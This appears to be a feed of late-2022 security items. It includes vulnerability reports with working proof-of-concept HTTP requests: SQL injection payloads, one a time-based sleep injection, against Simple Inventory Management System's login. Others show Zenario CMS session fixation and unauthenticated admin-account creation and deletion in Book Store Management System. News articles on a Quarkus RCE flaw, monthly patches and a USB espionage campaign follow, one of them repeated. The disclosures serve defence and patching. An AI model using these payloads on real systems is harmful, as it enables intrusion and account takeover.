Simple Inventory Management System v1.0 is vulnerable to SQL Injection via /ims/login.php.

**Simple Inventory Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: li-baige

vendors:https://www.sourcecodester.com/php/15419/simple-inventory-management-system-phpoop-free-source-code.html

Vulnerability File: /ims/login.php

Parameter "email" (POST), exists SQL injection vulnerability

Payload1: email=a'&pwd=b&login=

    POST /ims/login.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=3gtl0ab587o41bs2nnm02st0ve
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/ims/login.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 21
    
    email=a'&pwd=b&login=
    

In response to an error

Payload2: email=a''&pwd=b&login=

    POST /ims/login.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=3gtl0ab587o41bs2nnm02st0ve
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/ims/login.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 22
    
    email=a''&pwd=b&login=
    

In response to the right

Payload3: email=a'%2b(select\*from(select(sleep(20)))a)%2b'&pwd=b&login=

    POST /ims/login.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=3gtl0ab587o41bs2nnm02st0ve
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/ims/login.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 61
    
    email=a'%2b(select*from(select(sleep(20)))a)%2b'&pwd=b&login=
    

Response time is 20 seconds

CVE-2022-44151: bug_report/SQLi-1.md at main · li-baige/bug_report

Red Hat has issued patches for a bug in an open source Java virtual machine software that opens the door to drive-by localhost attacks. Patch now, as it's easy for cyberattackers to exploit.

A critical remote code execution (RCE) bug in an open source Java virtual machine (JVM) framework threatens enterprise environments by giving attackers an easy way to compromise development teams — thus gaining access to production systems.

That's according to Joseph Beeton, senior application security researcher at Contrast Security, who discovered the vulnerability in Quarkus, a Red Hat-managed, Kubernetes-native Java framework that's optimized for JVMs.

The bug is tracked as CVE-2022-4116 and has been given a rating of 9.8 on the CVSS.

The relatively new Quarkus framework is used as a platform for serverless, cloud, and Kubernetes environments — the last of which is the de facto container management platform for cloud-native environments, and has had numerous security issues of its own.

The Quarkus flaw is present in the framework's Dev UI Config Editor, making it vulnerable to drive-by localhost attacks that could lead to RCE, Beeton wrote in a blog post published Nov. 29. Moreover, "exploiting the vulnerability isn’t difficult, and can be done by a malicious actor without any privileges," he noted in the post.

Beeton discovered the vulnerability some weeks ago while preparing a talk for the recently held DeepSec conference, but says that he waited to disclose his findings until after Red Hat published details of the flaw on its customer support portal Nov. 21. Beeton also published a proof of concept exploit for CVE-2022-4116 in his post.

Patched versions of Quarkus, available now, are 2.14.2.Final and 2.13.5.Final (LTS); anyone using the framework is encouraged to update immediately.

**'Dangerous' Security Flaw**

The vulnerability affects the "quarkus\_dev\_ui" package, according to Red Hat, which means it impacts developers building services using Quarkus, not actual services running in production.

However, it's still dangerous for several reasons — for one because it's fairly easy to exploit, and for another because developers often have direct access to an enterprise's production environment, Beeton tells Dark Reading.

"Developers generally have access to production systems, and even if they don't, they do have the ability to make code changes," he says. "A compromised developer's machine could be leveraged to push malicious code changes to production.”

For example, if a developer running Quarkus locally visits a website with malicious JavaScript, that JavaScript can silently execute code on the developer’s machine, which can lead to all kinds of trouble on any network or assets attached to it.

In enterprise cloud-based environments, developers also often have to code bases, Amazon Web Services keys, server credentials, and other assets, Beeton said in his posting.

"Access to the developer's machine gives an attacker a great deal of scope to pivot to other resources on the network, as well as to modify or to flat-out steal the codebase," he wrote.

**The Bug in a Cloud-Security Context**

The flaw must be understood in the context of cloud-based footprints that have numerous hosted services running in a larger environment, Beeton explained. One misconception about this type of architecture is that "services that are only bound to localhost are not accessible from the outside world," he noted in his post.

"Because of this misplaced belief, developers, for the sake of convenience, will run services they are developing that are configured in a less secure way compared with how they would \[typically\] do it," he wrote.

There's no problem with this scenario in the case of accessing normal JavaScript in a browser and loaded from a nonmalicious domain, he said. In that case, the JavaScript would not be able to make requests to other domains, including localhost, without a preflight request that is used to check the server's Cross-Origin Resource Sharing (CORS) settings. This is a standard check to see if the server allows requests from the domain being accessed.

However, in the case of a certain type of request that does not require a preflight request — called Simple Requests — the flaw comes into play, Beeton said.

"For a Simple Request, the browser makes the request, receives the response, but that data — including the HTTP Status Code — is not returned to JavaScript," he wrote. "It is possible, however, to infer whether the request was successful based on how long it took to return. Within those constraints, it is possible to access localhost and, in certain circumstances, to trigger arbitrary code execution."

**Multiple Ways Developers Can Be Targeted**

If this is the case, threat actors can compromise websites that developers use by injecting malicious JavaScript into ads served on the sites. For an attack on the Quarkus flaw to be successful in this scenario, someone who is running Quarkus in developer mode would have to visit a website containing the malicious JavaScript, Beeton said.

In this way, attackers can access developer code via non preflighted HTTP requests to those services bound to localhost, he explained.

"It just requires that Quarkus is running in developer mode at the same point the browser tab is open," he noted. "No other interaction is required for this vulnerability to be exploited."

Attackers also can exploit the flaw by launching a phishing attack that convinces a developer to open a web browser on a compromised page. "If they happen to be running Quarkus in developer mode, compromising them would merely entail getting them to click the link; the page containing malicious JavaScript will then be loaded, and they would be compromised," Beeton explained.

Other ways the flaw can be exploited are through common misconfigurations in the Spring framework, which provides a comprehensive programming and configuration model for modern Java-based enterprise applications, he said. Alternatively, an attacker can exploit known vulnerabilities to generate an RCE on the developer's machine or on other services on their private network.  

**Potential Impact and Fix**

There are two bits of good news surrounding the status of the flaw, Beeton acknowledged. One is that Red Hat's Quarkus team, as mentioned before, already has issued a fix that requires the Dev UI to check origin headers for "origin : localhost" — which is set by the browser itself and not modifiable by JavaScript — and only accept these requests, he said.

The other reassuring aspect is that Quarkus is a young framework, having been launched in 2019, so it's not likely to be used as extensively as, say, the open-source Spring Boot framework, he said.

And while Quarkus is gaining in popularity, particularly for Kubernetes enthusiasts, "given its ease of use and significantly lighter demand on hardware resources to run and to run applications," it still is not as widely used as Kubernetes itself, Beeton said.

"Therefore, the number of developers affected by this drive-by localhost attack is probably small," he said.

**Squashing the Attack Vector**

Even with the Quarkus flaw fixed, developers using open-source frameworks still should be wary as they develop services via the localhost, as there are likely more vulnerabilities equivalent to CVE-2022-4116 that have yet to be found, Beeton warned.

A solution for the entire attack vector is on the horizon with W3C’s new Private Network Access (PNA) specification, which eventually will be integrated into browsers to squash this mode of exploit altogether, he said.

Currently, however, only the team supporting the Chromium framework — the basis for the Chrome and Edge browsers — is actively working to implement the new spec, Beeton said. In fact, the targeted mid-December release of Chrome 109 should include support for PNA.

Firefox, meanwhile, has PNA support on its backlog, but has not yet scheduled a release date, while plans to add the spec to Safari or Edge remain unclear, though the Chromium update may bode well for its upcoming addition in Edge, he added.

Critical Quarkus Flaw Threatens Cloud Developers With Easy RCE

A vulnerability, which was classified as problematic, has been found in Tribal Systems Zenario CMS 9.3.57595. This issue affects some unknown processing of the component Remember Me Handler. The manipulation leads to session fixiation. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-214589 was assigned to this vulnerability.

Description: In Zenario CMS user session identifier (authentication token) is issued to the browser prior to authentication but is not changed after user logout and login again into the application when "Remember me" option active. Failing to issue a new session ID following a successful login introduces the possibility for an attacker to set up a trap session on the device the victim is likely to login with.

The product(s): https://zenar.io

Affected product(s)/code base: https://github.com/TribalSystems/Zenario

Affected component(s): /Zenario-9.3.57595/zenario/admin/welcome.ajax.php

Tested version: Zenario-9.3.57595

Proof of Concept:

1.  Logout with current session to confirm the session is not valid

Burpsuite Request:

POST /Zenario-9.3.57595/zenario/admin/welcome.ajax.php?task=logout&get=%7B%22task%22%3A%22logout%22%2C%22cID%22%3A%221%22%2C%22cType%22%3A%22html%22%7D HTTP/1.1
Host: localhost
Content-Length: 19
Accept: text/plain, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Referer: http://localhost/Zenario-9.3.57595/admin.php?task=logout&cID=1&cType=html
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9
Cookie: PHPSESSID-Zenario\_9\_3\_57595=mbu2ar0qnut2bmibuka94fq1ue
Connection: close

\_fill=true&\_values=

To confirm, request change password for admin is not success.

2.  Login as administrator with "Remember me".

Burpsuite Request:

POST /Zenario-9.3.57595/zenario/admin/welcome.ajax.php?task=&get=%7B%22cID%22%3A%221%22%2C%22cType%22%3A%22html%22%7D HTTP/1.1
Host: localhost
Content-Length: 726
Accept: text/plain, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Referer: http://localhost/Zenario-9.3.57595/admin.php?cID=1&cType=html
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9
Cookie: PHPSESSID-Zenario\_9\_3\_57595=mbu2ar0qnut2bmibuka94fq1ue
Connection: close

\_validate=true&\_box={"tab"%3a"~login","tabs"%3a{"login"%3a{"edit\_mode"%3a{"on"%3a1},"fields"%3a{"reset"%3a{"\_was\_hidden\_before"%3atrue},"description"%3a{},"secure\_connection"%3a{"\_was\_hidden\_before"%3atrue},"not\_secure\_connection"%3a{},"username"%3a{"current\_value"%3a"~leecybersec~40gmail~2Ecom"},"password"%3a{"current\_value"%3a"~leecybersec"},"admin\_login\_captcha"%3a{"\_was\_hidden\_before"%3atrue,"current\_value"%3a""},"remember\_me"%3a{"current\_value"%3atrue},"admin\_link"%3a{},"login"%3a{"pressed"%3atrue},"forgot"%3a{"pressed"%3afalse},"previous"%3a{"pressed"%3afalse}}},"forgot"%3a{"edit\_mode"%3a{"on"%3a1},"fields"%3a{"description"%3a{},"email"%3a{"current\_value"%3a""},"previous"%3a{},"reset"%3a{}}}},"path"%3a"~login"}

To confirm, request change password for admin is success.

Discoverer(s)/Credits: CMCSOC Redteam (@lithonn)

*   Ngo Van Tu (@leecybersec)
*   Tran Thi Nho (@nhott)
*   Huynh Nhat Hao (@h40huynh)
*   Le Thi Huyen My (@Huy3nMy)

CVE-2022-4231: bug-report/vendors/tribalsystems/zenario/session-fixation at main · lithonn/bug-report

A vulnerability classified as critical was found in SourceCodester Book Store Management System 1.0. This vulnerability affects unknown code of the file /bsms_ci/index.php. The manipulation leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-214588.

Description: Vulnerability was found in SourceCodester Book Store Management System 1.0. This vulnerability allows a remote attacker to access all URLs without logging in and use all actions like account management page.

The product(s): https://www.sourcecodester.com/php/15748/book-store-management-system-project-using-php-codeigniter-3-free-source-code.html

Affected product(s)/code base: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bsms\_ci.zip

Affected component(s):

*   /bsms\_ci/index.php/category/\*
*   /bsms\_ci/index.php/book/\*
*   /bsms\_ci/index.php/transaction/\*
*   /bsms\_ci/index.php/history/\*
*   /bsms\_ci/index.php/user/\*

Proof of Concept: Access all URLs without logging in and use all actions like an admin like edit, detele, add new account.

1.  Send a request Add new account without cookie

Burpsuite Request:

POST /bsms\_ci/index.php/user/add HTTP/1.1
Host: localhost
Content-Length: 64
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="107", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/bsms\_ci/index.php/user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

fullname=john&username=john&password=12345&level=admin&save=Save

Image:

2.  Send a request Delete account without cookie

Burpsuite Request:

GET /bsms\_ci/index.php/user/hapus/2 HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="107", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/bsms\_ci/index.php/user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

Image:

Discoverer(s)/Credits: CMCSOC Redteam (@lithonn)

*   Ngo Van Tu (@leecybersec)
*   Tran Thi Nho (@nhott)
*   Huynh Nhat Hao (@h40huynh)
*   Le Thi Huyen My (@Huy3nMy)

CVE-2022-4229: bug-report/vendors/oretnom23/bsms_ci/broken-access-control at main · lithonn/bug-report

Plus: Major patches dropped this month for Chrome, Firefox, VMware, Cisco, Citrix, and SAP.

November saw the release of patches from the likes of Apple’s iOS, Google Chrome, Firefox, and Microsoft Windows to fix multiple security vulnerabilities. Some of these issues are pretty severe, and several have already been exploited by attackers. 

Here’s what you need to know about all the important updates released in the past month.

Apple iOS and iPadOS 16.1.1

Apple has released iOS and iPadOS 16.1.1, which the iPhone maker recommends all users apply. The patch fixes two security vulnerabilities—and given the speed of the release, you can assume they are pretty serious. 

Tracked as CVE-2022-40303 and CVE-2022-40304, the two flaws in the libxml2 software library could allow an attacker to execute code remotely, according to Apple’s support page. The issues were both reported by security researchers working for Google’s Project Zero. 

For Mac users, the flaws were addressed by macOS Ventura 13.0.1.

The good news is, it’s believed neither vulnerability has been exploited by attackers, but it’s still a good idea to apply the update as soon as possible. 

Microsoft Windows

Microsoft’s November Patch Tuesday was another big release, seeing the Windows maker fix 68 vulnerabilities, four of which were zero days. 

Tracked as CVE-2022-41073, the first is a Windows print spooler elevation of privilege vulnerability that could allow a cybercriminal to gain system privileges. Meanwhile, CVE-2022-41125 is a Windows Cryptographic Next Generation key isolation issue that could allow an adversary to escalate privileges and gain control of the system. CVE-2022-41128 is a Windows scripting language vulnerability that could result in remote code execution. Lastly, CVE-2022-41091 is a vulnerability in Microsoft’s Mark of the Web security feature.

Google Android

More big updates for users of Google’s Android devices have arrived in November, with Google issuing patches for multiple vulnerabilities, some of which are serious. At the top of the list is a high-severity vulnerability in the Framework component that could lead to local escalation of privilege, Google said in a security advisory.

The patches in November include two Google Play system updates for issues impacting the Media Framework components (CVE-2022-2209) and WiFi (CVE-2022-20463). Google also fixed five issues affecting its Pixel devices.

The Android updates have started to roll out to Samsung devices, including third- and fourth-generation Galaxy foldables. You can check for the update in your Settings. 

Google Chrome 

The world’s most popular browser continues to be a major target for attackers, with Google this month fixing its eighth zero-day vulnerability this year. 

The vulnerability, tracked as CVE-2022-4135, is a heap buffer overflow in GPU reported by Clement Lecigne, a researcher in Google's own threat analysis group. Google said it “is aware that an exploit for CVE-2022-4135 exists in the wild.”

Earlier in the month, Google issued an update to fix 10 Chrome vulnerabilities, six of which are rated as high-severity. These include four use-after-free bugs: CVE-2022-3885, CVE-2022-3886, CVE-2022-3887, and CVE-2022-3888. Meanwhile, CVE-2022-3889 is a “type confusion” issue in V8, and CVE-2022-3890 is a heap buffer overflow in Crashpad. 

Mozilla Firefox

November was also a big month for Google Chrome competitor Firefox. Mozilla has issued Firefox 107, fixing 19 security vulnerabilities, eight of which are marked as having a high impact. 

One of the most important patches is for CVE-2022-45404, a full-screen notification bypass that could allow an attacker to cause a window to go full-screen without the user seeing the notification prompt. This could result in spoofing attacks. Meanwhile, several use-after-free bugs could lead to an exploitable crash, and one flaw could be exploited to run arbitrary code.

VMWare

Software maker VMWare has released security fixes for multiple security vulnerabilities in its VMware Workspace ONE Assist, three of which have a CVSSv3 base score of 9.8. The first, CVE-2022-31685, is an authentication bypass vulnerability. “A malicious actor with network access to Workspace ONE Assist may be able to obtain administrative access without the need to authenticate to the application,” VMWare warned in an advisory.

A broken authentication method vulnerability tracked as CVE-2022-31686 could enable a malicious actor with network access to obtain admin access without the need to authenticate.

Drop What You're Doing and Update iOS, Android, and Windows

A threat actor with a suspected China nexus has been linked to a set of espionage attacks in the Philippines that primarily relies on USB devices as an initial infection vector.
Mandiant, which is part of Google Cloud, is tracking the cluster under its uncategorized moniker UNC4191. An analysis of the artifacts used in the intrusions indicates that the campaign dates as far back as September

A threat actor with a suspected China nexus has been linked to a set of espionage attacks in the Philippines that primarily relies on USB devices as an initial infection vector.

Mandiant, which is part of Google Cloud, is tracking the cluster under its uncategorized moniker **UNC4191**. An analysis of the artifacts used in the intrusions indicates that the campaign dates as far back as September 2021.

"UNC4191 operations have affected a range of public and private sector entities primarily in Southeast Asia and extending to the U.S., Europe, and APJ," researchers Ryan Tomcik, John Wolfram, Tommy Dacanay, and Geoff Ackerman said.

"However, even when targeted organizations were based in other locations, the specific systems targeted by UNC4191 were also found to be physically located in the Philippines."

The reliance on infected USB drives to propagate the malware is unusual if not new. The Raspberry Robin worm, which has evolved into an initial access service for follow-on attacks, is known to use USB drives as an entry point.

The threat intelligence and incident response firm said that the attacks led to the deployment of three new malware families dubbed MISTCLOAK, DARKDEW, BLUEHAZE, and Ncat, the latter of which is a command-line networking utility that's used to create a reverse shell on the victim system.

MISTCLOAK, for its part, gets activated when a user plugs in a compromised removable device to a system, acting as a launchpad for an encrypted payload called DARKDEW that's capable of infecting removable drives, effectively proliferating the infections.

"The malware self-replicates by infecting new removable drives that are plugged into a compromised system, allowing the malicious payloads to propagate to additional systems and potentially collect data from air-gapped systems," the researchers explained.

The DARKDEW dropper further serves to launch another executable ("DateCheck.exe"), a renamed version of a legitimate, signed application known as "Razer Chromium Render Process" that invokes the BLUEHAZE malware.

BLUEHAZE, a launcher written in C/C++, takes the attack chain forward by starting a copy of Ncat to create a reverse shell to a hardcoded command-and-control (C2) address.

"We believe this activity showcases Chinese operations to gain and maintain access to public and private entities for the purposes of intelligence collection related to China's political and commercial interests," the researchers said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Chinese Cyber Espionage Hackers Using USB Devices to Target Entities in Philippines

A threat actor with a suspected China nexus has been linked to a set of espionage attacks in the Philippines that primarily relies on USB devices as an initial infection vector.

Mandiant, which is part of Google Cloud, is tracking the cluster under its uncategorized moniker **UNC4191**. An analysis of the artifacts used in the intrusions indicates that the campaign dates as far back as September 2021.

"UNC4191 operations have affected a range of public and private sector entities primarily in Southeast Asia and extending to the U.S., Europe, and APJ," researchers Ryan Tomcik, John Wolfram, Tommy Dacanay, and Geoff Ackerman said.

"However, even when targeted organizations were based in other locations, the specific systems targeted by UNC4191 were also found to be physically located in the Philippines."

The reliance on infected USB drives to propagate the malware is unusual if not new. The Raspberry Robin worm, which has evolved into an initial access service for follow-on attacks, is known to use USB drives as an entry point.

The threat intelligence and incident response firm said that the attacks led to the deployment of three new malware families dubbed MISTCLOAK, DARKDEW, and BLUEHAZE, alongside Ncat, the latter of which is a command-line networking utility that's used to create a reverse shell on the victim system.

MISTCLOAK, for its part, gets activated when a user plugs in a compromised removable device to a system, acting as a launchpad for an encrypted payload called DARKDEW that's capable of infecting removable drives, effectively proliferating the infections.

"The malware self-replicates by infecting new removable drives that are plugged into a compromised system, allowing the malicious payloads to propagate to additional systems and potentially collect data from air-gapped systems," the researchers explained.

The DARKDEW dropper further serves to launch another executable ("DateCheck.exe"), a renamed version of a legitimate, signed application known as "Razer Chromium Render Process" that invokes the BLUEHAZE malware.

BLUEHAZE, a launcher written in C/C++, takes the attack chain forward by starting a copy of Ncat to create a reverse shell to a hardcoded command-and-control (C2) address.

"We believe this activity showcases Chinese operations to gain and maintain access to public and private entities for the purposes of intelligence collection related to China's political and commercial interests," the researchers said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Type confusion in V8 in Google Chrome prior to 108.0.5359.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2022-4174

Insufficient validation of untrusted input in Downloads in Google Chrome prior to 108.0.5359.71 allowed an attacker who convinced a user to install a malicious extension to bypass Downloads restrictions via a crafted HTML page. (Chromium security severity: Medium)

CVE-2022-4186

Use after free in Camera Capture in Google Chrome prior to 108.0.5359.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

Tag

#chrome